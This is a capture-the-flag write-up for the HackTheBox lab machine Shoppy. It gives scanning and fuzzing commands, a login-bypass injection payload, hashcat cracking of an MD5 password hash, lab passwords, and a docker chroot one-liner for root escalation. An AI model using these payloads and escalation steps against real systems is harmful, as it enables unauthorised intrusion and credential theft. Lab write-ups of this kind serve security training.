CTF Choppy

CTFHackTheBox
,

Rustscan

1
rustscan -a 10.10.11.180

Output:

1
2
3
4
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
9093/tcp open  copycat syn-ack

/etc/hosts

1
echo "10.10.11.180 shoppy.htb" >> /etc/hosts

Port 80

Subdomain listing

1
wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hw 9000 --sc 200

Add mattermost.shoppy.htb to /etc/hosts

Gobuster

1
gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard switch

Output:

1
2
3
4
5
6
7
8
9
10
11
12
/images               (Status: 301) [Size: 179] [--> /images/]
/login                (Status: 200) [Size: 1074]              
/admin                (Status: 302) [Size: 28] [--> /login]   
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/Login                (Status: 200) [Size: 1074]              
/js                   (Status: 301) [Size: 171] [--> /js/]    
/fonts                (Status: 301) [Size: 177] [--> /fonts/] 
/Admin                (Status: 302) [Size: 28] [--> /login]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/LogIn                (Status: 200) [Size: 1074]               
/LOGIN                (Status: 200) [Size: 1074]

Login page

http://shoppy.htb/login

You can bypass the login page
I will use burpsuite to intercept the trafic.

While I was playing with burpsuite I go an interesting error:

We have an username jaeger.
/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js

Bypass auth login page

When I put a ‘ the page take more time to load.
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
I from this liste I took this '||'2 and add admin at the beggining.

Searsh for user

I have to search for a user, it’s not working with jaeger.

I enter '||'2 to find a new user, josh.

Crack the password

This is a hash, probably MD5.
6ebcea65320589ca4f2f1ce039975995
https://www.dcode.fr/cipher-identifier 

1
2
echo "6ebcea65320589ca4f2f1ce039975995" > hash      
hashcat -m 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

remembermethisway

Mattermost

http://mattermost.shoppy.htb/login

jaeger is a linux user, I saw him in the error with burpsuite.
Let’s use ssh.

jaeger

1
ssh [email protected]

sudo -l 

1
sudo -u deploy /home/deploy/password-manager

I don’t have the password, if I use strings I see nothing but with cat it’s working.

Sample

deploy

1
ssh [email protected]

Deploying@pp!
I’m using lse again.

I can use docker, I can also exploit it with GTFOBins.
https://gtfobins.github.io/gtfobins/docker/

1
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

I’m root